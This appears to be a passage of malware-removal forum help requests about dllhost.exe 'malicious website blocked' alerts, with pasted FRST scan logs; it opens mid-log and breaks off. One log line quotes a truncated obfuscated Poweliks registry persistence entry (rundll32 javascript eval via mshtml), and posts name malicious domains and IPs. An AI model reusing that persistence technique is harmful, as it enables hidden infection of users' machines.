C:\windows\Minidump\102514-91525-01.dmp 2014-10-25 19:07 - 2013-05-20 18:41 - 00000000 ____D () C:\Users\Office\AppData\Local\Akamai 2014-10-25 13:36 - 2012-12-08 14:25 - 00000000 _____ () C:\windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt 2014-10-25 13:36 - 2012-08-18 13:53 - 00000052 _____ () C:\windows\SysWOW64\DOErrors.log 2014-10-25 02:01 - 2012-08-19 20:50 - 00003894 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineUA 2014-10-25 02:01 - 2012-08-19 20:50 - 00003642 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineCore 2014-10-25 02:01 - 2012-08-19 20:50 - 00000898 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job 2014-10-25 02:01 - 2012-08-19 20:50 - 00000894 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job 2014-10-24 14:16 - 2014-06-21 20:49 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-10-24 14:16 - 2013-11-22 12:07 - 00001161 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-10-24 10:18 - 2010-11-20 20:47 - 01081140 _____ () C:\windows\PFRO.log 2014-10-23 05:30 - 2014-02-24 19:25 - 00003598 _____ () C:\windows\System32\Tasks\G2MUpdateTask-S-1-5-21-3549027879-2872290269-2961675323-1000 2014-10-22 14:35 - 2012-09-12 13:44 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Virtual PC 2014-10-21 21:52 - 2014-02-28 19:05 - 00000000 ____D () C:\Users\Office\Documents\GeoData 2014-10-21 14:18 - 2013-07-12 15:43 - 00000000 ____D () C:\Users\Office\AppData\Roaming\DSite 2014-10-19 22:06 - 2012-08-21 16:25 - 00000000 ____D () C:\windows\system32\Drivers\N360x64 2014-10-19 22:06 - 2012-08-10 21:08 - 00003228 _____ () C:\windows\System32\Tasks\Norton WSC Integration 2014-10-19 22:05 - 2013-12-01 11:03 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security Suite 2014-10-19 22:05 - 2013-11-25 22:36 - 00002442 _____ () C:\Users\Public\Desktop\Norton Security Suite.lnk 2014-10-16 19:01 - 2012-08-19 20:51 - 00002238 _____ () C:\Users\Public\Desktop\Google Chrome.lnk 2014-10-15 04:27 - 2009-07-13 20:20 - 00000000 ____D () C:\windows\rescache 2014-10-15 03:38 - 2009-07-13 22:09 - 00000000 ____D () C:\windows\System32\Tasks\WPD 2014-10-15 03:34 - 2009-07-13 21:45 - 00440176 _____ () C:\windows\system32\FNTCACHE.DAT 2014-10-15 03:30 - 2014-05-06 03:00 - 00000000 ___SD () C:\windows\system32\CompatTel 2014-10-15 03:30 - 2009-07-13 20:20 - 00000000 ____D () C:\windows\SysWOW64\Dism 2014-10-15 03:30 - 2009-07-13 20:20 - 00000000 ____D () C:\windows\system32\Dism 2014-10-15 03:13 - 2012-08-21 22:10 - 00000000 ____D () C:\ProgramData\Microsoft Help 2014-10-15 03:09 - 2013-08-15 03:01 - 00000000 ____D () C:\windows\system32\MRT 2014-10-15 03:00 - 2012-08-26 17:54 - 103265616 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe 2014-10-15 01:54 - 2013-01-18 13:54 - 00001415 _____ () C:\Users\Office\Desktop\GoToMeeting.lnk 2014-10-15 01:54 - 2012-08-28 18:25 - 00002489 _____ () C:\Users\Office\Desktop\GoToMeeting Quick Connect.lnk 2014-10-09 10:17 - 2012-08-21 16:12 - 00000000 ____D () C:\Users\Office\AppData\Local\ID Vault 2014-10-08 22:04 - 2013-02-13 04:26 - 00049752 _____ (Zemana Ltd.) C:\windows\system32\Drivers\AntiLog64.sys 2014-10-08 22:04 - 2013-02-13 04:26 - 00000000 ____D () C:\windows\SysWOW64\ZALSDK_uninst 2014-10-08 22:04 - 2012-08-21 16:11 - 00002256 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Constant Guard.lnk 2014-10-08 22:04 - 2012-08-21 16:11 - 00002244 _____ () C:\Users\Public\Desktop\Constant Guard.lnk 2014-10-08 16:56 - 2014-09-07 14:25 - 00000000 ____D () C:\Program Files (x86)\iTunes 2014-10-02 21:40 - 2014-02-09 17:09 - 00002000 _____ () C:\Users\Office\Desktop\Sync Folder.lnk 2014-10-02 21:40 - 2013-07-07 17:10 - 00004022 _____ () C:\windows\System32\Tasks\LaunchApp 2014-10-01 11:11 - 2014-06-21 20:49 - 00093400 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys 2014-10-01 11:11 - 2014-06-21 20:49 - 00063704 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys 2014-10-01 11:11 - 2013-11-22 12:07 - 00025816 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys 2014-09-29 13:32 - 2014-08-27 16:03 - 00000000 ____D () C:\Users\Office\Documents\Better For You CHIA project 2014-09-28 16:48 - 2013-07-14 11:53 - 00000000 ____D () C:\windows\System32\Tasks\NCH Software 2014-09-27 13:37 - 2013-07-12 13:23 - 00000000 ____D () C:\Users\Office\Documents\Any Video Converter 2014-09-27 09:51 - 2012-08-17 16:43 - 00000000 ____D () C:\Users\Office\AppData\Local\PDFC 2014-09-27 08:09 - 2014-09-25 20:07 - 00000000 ____D () C:\Users\Office\AppData\Local\{AD6D95B6-1A16-454D-A1F5-E8ADAC9FC5AE} Some content of TEMP: ==================== C:\Users\Office\AppData\Local\Temp\@TVSoftware.exe C:\Users\Office\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp3zs_ff.dll C:\Users\Office\AppData\Local\Temp\instmsia.exe C:\Users\Office\AppData\Local\Temp\instmsiw.exe C:\Users\Office\AppData\Local\Temp\ISSetup.dll C:\Users\Office\AppData\Local\Temp\Setup.exe C:\Users\Office\AppData\Local\Temp\WindowsInstaller-KB893803-x86.exe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signed C:\Windows\System32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\System32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\System32\services.exe => File is digitally signed C:\Windows\System32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\System32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\System32\rpcss.dll => File is digitally signed C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-10-16 00:40 ==================== End Of Log ============================ Addition.txt FRST.txt
  12. I keep getting notifications of a malicious website blocked. Domain: e9967a.com IP 31.184.192.92 Port: 62338 Outbound Process: C:\Widoes\SysWOW64\dllhost.exe sometimes the IP changes and sometimes the domain doesn't show up. I get the notification several times per minute. I've run scans on both Avast and Malwarebytes several times even with the rootkit scan but nothing comes up. What should I do?
  13. Hello I have recently (the last couple days) been constantly getting the "Malicious Website Blocked" popups, even when no web browsers are open. As many others on here have written, the popups report different IPs, different/no domains, different ports, but are always "outbound" types, and the process is always "C:\Windows\SysWOW64\dllhost.exe", although I have now noticed a few times where it's a different file name than "dllhost.exe". I have scanned many times with MBAM Premium, with rootkits checked, but it always comes up clean. Also, my situation may be unique because I have noticed over the last couple days when I scan with AVG at startup that it finds about 7 medium threats called "Malsign.Generic.712". It always secures/removes them, then I rescan and it's clean, but then the next time when I start up and scan with AVG, I get that same virus scan result. So I may have at least a couple problems simultaneously going on here I have hesitated to just start tinkering around with some of the in-depth resolutions offered on the forums here, because (1)I am new to trying to manually extract malware/viruses, and (2) because they are for the specific person/computer, and I don't want to make things worse. Can anyone help me get this straightened out? Thank you in advance for any help! Seanster
  14. Just lile so many others. However I believe I have two computers infected. Both are now protected with Malware Bytes Premium, so websites are blocked. Please help. Bill Schickling
  15. I keep getting a pop-up saying "Malicious website blocked" Process: C:\Windows\SysWOW64\dllhost.exe My CPU and RAM are ridiculously high and my computer has gone to bluescreen and crashed twice while trying to scan it. I finally did scan it though and it, of course, didn't find anything. Neither did System Mechanic Pro. I've seen a lot of posts about this, but since I have no idea what I'm doing, I'd really like someone to walk me through it I guess. Thanks c:
  16. Have had issues with high CPU and memory usage, multiple dllhost.exe files, and in general some weird stuff. Installed and ran Malwarebytes Anti-Malware, continue to get "Malicious Website Blocked", different domain names, different IP, different ports, always "Outbound", and process is always C:\Windows\SysWOW64\dllhost.exe Ran FRST and attached FRST.txt and Addition.txt. Also attached FixLog.txt Ran Malwarebytes Anti-Malware, and attached scan log entitled ScanLog.txt. Ran AdwCleaner, and attached log entitled AdwCleaner[s0].txt Still getting "Malicious Website Blocked" notices every few seconds. Could use some help continuing to troubleshoot and ensure nothing else is hanging onto my computer. Thanks. FRST.txt Addition.txt ScanLog.txt Fixlog.txt AdwCleanerS0.txt
  17. After installing MB I am getting a constant barrage of "Malicious Website Blocked" (usually 95.215.1.57) and "Malware Detected" (usually Trojan.FakeMS) I have attached the FRST files. Addition.txt FRST.txt
  18. I keep getting this popup from Malwarebytes after running my initial scan. I do have dllhost.exe in my task manager processes, but usually only 2 and they aren't consuming a lot of resources like what I've read about with others. I've noticed a strange behavior with my browsers (Firefox and IE) which is why I decided to download MWB in the first place. I was getting IE crashes with no browser or processes open. After running MWB, that seems to have stopped, but now the contant popups... please help! Thanks in advance!
  19. My problem is very insidious, and also very weird. As soon as I connect to the internet, my CPU is flooded by multiple instances of ctfmon.exe, about 17 to 20 instances in the Task Manager. They appear only for a moment before disappearing again, but then multiples instances of explorer.exe (the Windows Explorer, not Internet Explorer) pop up, using anywhere from 25% to 60% of my CPU. Sometimes, even multiple instances of dllhost.exe pop into the Task Manager as well. At this point, my malware removal and prevention steps have taken me through running in Safe Mode and running Malwarebytes Anti-Malware, Spybot - Search and Destroy, and even Windows Malware Removal Tool. These programs find no infected files, and say the computer is clean. Doing research has been hell. I have to continually disable and enable my network adaptor to keep from being overrun, but I have succeeded somewhat. A lot of the forums I have looked at say this is a rootkit issue; one person even started deleting registry keys (I have absolutely no intention of playing that type of Russian Roulette). I saw an entry here, linked at http://forums.malwarebytes.org/index.php?/topic/140963-multiple-instances-of-explorerexe-in-task-manager/, and the solution went very far, but the user stopped responding near the end, and thus the topic was closed. Instead of just blindly following that topic, I have decided to post here myself to find out what should be done in my case. Any assistance would be appreciated. My smartphone is currently unaffected, so I will be receiving e-mail updates by following my thread on here, and I will turn my adaptor back on to receive instructions and continue to debug this issue. Thank you very much for your time.
  20. Hi - I'm having the same problem that a lot of people have posted about with dllhost.exe and cannot get rid of it. I've ran malwarebytes premium and it detected some items, but worried that the problem will come back like with other users. Scan log attached. Please help! Threat Scan Log.txt
  21. Computer started running slow yesterday. My free version of Avast found three problems and tried to fix. I downloaded Malwarebytes and it also fixed some problems. Looking in my Task Manager, Processes tab I see a few entreis for dllhost.exe *32 COM Surrogate. File Properties for them are C:\Windows\SysWOW64. For kicks I manually killed them and performance improved, but a few mins later my system again degraded. Attached are my Farbar FRST.txt and Addition.txt log files. Thanks. FRST.txt Addition.txt
  22. My PC started running slow yesterday so I ran MWB multiple times and it only removed things the first go. I was running MSE which removed some things, then I switched to AVG and it removed even more. I did a boot scan with AVG and quarantined all those items, but I still get the warning "Avast Web Shield has blocked a harmful webpage or file" C:\windows\syswow64\dllhost.exe. MWB cleaned some, rebooted, then I ran it again and found nothing. I still get the AVG Web Shield warnings. Any advice is appreciated. - Brian
  23. As does its lesser known, yet still just as annoying siblings dllhst3g.exe and dpnsvr.exe. All three processes have been spotted running on this computer. The latter two appeared for the first time, that I've seen, after scanning with Malwarebytes Premium and uninstalling Microsoft Security Essentials, which I'm starting to believe the latter was not the best thing to do... Also, those two very processes were both running at the same time dllhost.exe was, and when I ended dllhost.exe, the former processes both ended, as well. Coincidence? I THINK NOT! I am also getting constant notifications that an outbound connection has been blocked, going to such trustworthy sites as fff5ee.com, film-site.org and, my favourite, a blank. The dllhost.exe thing had been going on for some weeks, now. Thought I just goofed something up, and after not being able to fix it, got your program to try and salvage this computer. Scanned in safe-mode and found that a plethora of crap was calling my computer home, yet this still continues. I saved the log of the stuff found during the scan that was removed, and I have .png files of the notifications that are now constantly popping up, via snip-it captures, if they are requested. I also have run FRST, like stated, and have also run GMER and TDSS-Killer, without modifying anything. Just getting as much info from .txt files on here so that the unlucky fellow who decides to attempt to help my sorry butt can come to the conclusion that I'm screwed more rapidly. I'm pretty sure my computer's infected with Ebola. An update while writing this. My computer began to run slow, so I went to go chop off the exposed head, and saw three new processes I did not recognise. All three died when dllhost.exe was slain by yours truly. Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-11-2014Ran by Calahan (administrator) on HP8100-2 on 10-11-2014 22:57:24Running from C:\Users\Calahan\DownloadsLoaded Profile: Calahan (Available profiles: Mike2 & Logan & Elisa & Calahan & Administrator & Guest)Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)Internet Explorer Version 9Boot Mode: NormalTutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use- farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (AMD) C:\Windows\System32\atiesrxx.exe(AMD) C:\Windows\System32\atieclxx.exe(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe() C:\Windows\SysWOW64\PnkBstrA.exe(GlavSoft LLC.) C:\Program Files (x86)\TightVNC\tvnserver.exe(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler.exe(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler64.exe(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe() C:\Program Files\Plantronics\GameCom780\GameCom780.exe(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe(GlavSoft LLC.) C:\Program Files (x86)\TightVNC\tvnserver.exe(Logitech Inc.) C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe() C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe(Microsoft Corporation) C:\Windows\System32\taskmgr.exe(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Microsoft Corporation) C:\Windows\System32\SnippingTool.exe(Microsoft Corporation) C:\Windows\System32\wisptis.exe() C:\Users\Calahan\Downloads\nffvqpeh.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [7938080 2009-07-02] (Realtek Semiconductor)HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [196648 2009-06-03] (ActivIdentity)HKLM\...\Run: [] => [X]HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [483880 2009-06-03] (ActivIdentity)HKLM\...\Run: [GamecomSound] => C:\Program Files\Plantronics\GameCom780\GameCom780.exe [777448 2011-12-01] ()HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)HKLM-x32\...\Run: [iMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS \PIconStartup.exe [111640 2009-11-04] ()HKLM-x32\...\Run: [File Sanitizer] => C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\CoreShredder.exeHKLM-x32\...\Run: [Adobe Reader Speed Launcher] => "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"HKLM-x32\...\Run: [bCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)HKLM-x32\...\Run: [tvncontrol] => C:\Program Files (x86)\TightVNC\tvnserver.exe [815704 2010-07-08] (GlavSoft LLC.)HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [204136 2012-09-13] (Logitech Inc.)HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-05-07] (Oracle Corporation)HKLM-x32\...\Run: [startCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-04-17] (Advanced Micro Devices, Inc.)HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti- Malware\mbamdor.exe [54072 2014-10-01] (Malwarebytes Corporation)HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\Run: [Raptr] => C:\Program Files (x86)\Raptr\raptrstub.exe [55360 2014-06-24] (Raptr, Inc)HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\Run: [HydraVisionDesktopManager] => C:\Program Files (x86)\ATI Technologies\HydraVision\HydraDM.exe [380928 2009-10-19] (AMD)HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf \Overwolf.exe [39712 2014-10-22] (Overwolf LTD)HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\.. \mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!Startup: C:\Users\Mike2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Folding@home.lnkShortcutTarget: Folding@home.lnk -> C:\Program Files (x86)\FAHClient\HideConsole.exe ()Startup: C:\Users\Mike2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnkShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office \Office14\ONENOTEM.EXE (Microsoft Corporation) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:TabsStartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exeSearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms} &l=dis&o=CMDTDFSearchScopes: HKLM - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p={searchTerms} &ei={inputEncoding}&fr=chr-hp-psg&type=CMDTDFSearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms} &l=dis&o=CMDTDFSearchScopes: HKLM-x32 - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p= {searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMDTDFSearchScopes: HKCU - DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = SearchScopes: HKCU - {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office \Office14\GROOVEEX.DLL (Microsoft Corporation)BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files \Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office \Office14\URLREDIR.DLL (Microsoft Corporation)BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java \jre7\bin\ssv.dll (Oracle Corporation)BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java \jre7\bin\jp2ssv.dll (Oracle Corporation)DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/E/5/6/E5611B10-0D6D- 4117-8430-A67417AA88CD/LegitCheckControl.cabDPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cabHandler: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - No FileHandler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)Handler-x32: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files (x86)\Belarc\BelarcAdvisor\System \BAVoilaX.dll (Belarc, Inc.)Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype \Skype4COM.dll (Skype Technologies)Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txtTcpip\Parameters: [DhcpNameServer] 75.75.76.76 75.75.75.75 192.168.3.1 FireFox:========FF Plugin: @microsoft.com/GENUINE -> disabled No FileFF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)FF Plugin-x32: @java.com/DTPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin \npDeployJava1.dll (Oracle Corporation)FF Plugin-x32: @java.com/JavaPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)FF Plugin-x32: @microsoft.com/GENUINE -> disabled No FileFF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight \5.1.30514.0\npctrl.dll ( Microsoft Corporation)FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update \1.3.25.5\npGoogleUpdate3.dll (Google Inc.)FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update \1.3.25.5\npGoogleUpdate3.dll (Google Inc.)FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)FF Plugin HKU\S-1-5-21-2217723503-548262416-3983414958-1007: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users \Calahan\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)FF Plugin HKU\S-1-5-21-2217723503-548262416-3983414958-1007: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft \Ubisoft Game Launcher\npuplaypc.dll () Chrome: =======CHR HomePage: Default -> CHR StartupUrls: Default -> ""CHR Profile: C:\Users\Calahan\AppData\Local\Google\Chrome\User Data\DefaultCHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Calahan\AppData\Local\Google\Chrome\User Data \Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-31]CHR Extension: (AdBlock) - C:\Users\Calahan\AppData\Local\Google\Chrome\User Data\Default\Extensions \gighmmpiobklfepjocnamgkkbiglidom [2014-11-05]CHR Extension: (Google Wallet) - C:\Users\Calahan\AppData\Local\Google\Chrome\User Data\Default\Extensions \nmmhkkegccagdldgiimedpiccmgmieda [2014-05-14]CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars \ChromeExtension\skype_chrome_extension.crx [2014-07-14]CHR HKLM-x32\...\Chrome\Extension: [ogccgbmabaphcakpiclgcnmcnimhokcj] - C:\Windows\SysWOW64\jmdp\SweetNT.crx [2014 -07-14] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [277032 2009-06-03] (ActivIdentity)R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07- 14] (Microsoft Corporation)R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-04-07] (Hewlett-Packard) [File not signed]S3 OverwolfUpdater; C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [997664 2014-10-22] (Overwolf LTD)R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-04-07] (Hewlett-Packard) [File not signed]R2 PnkBstrA; 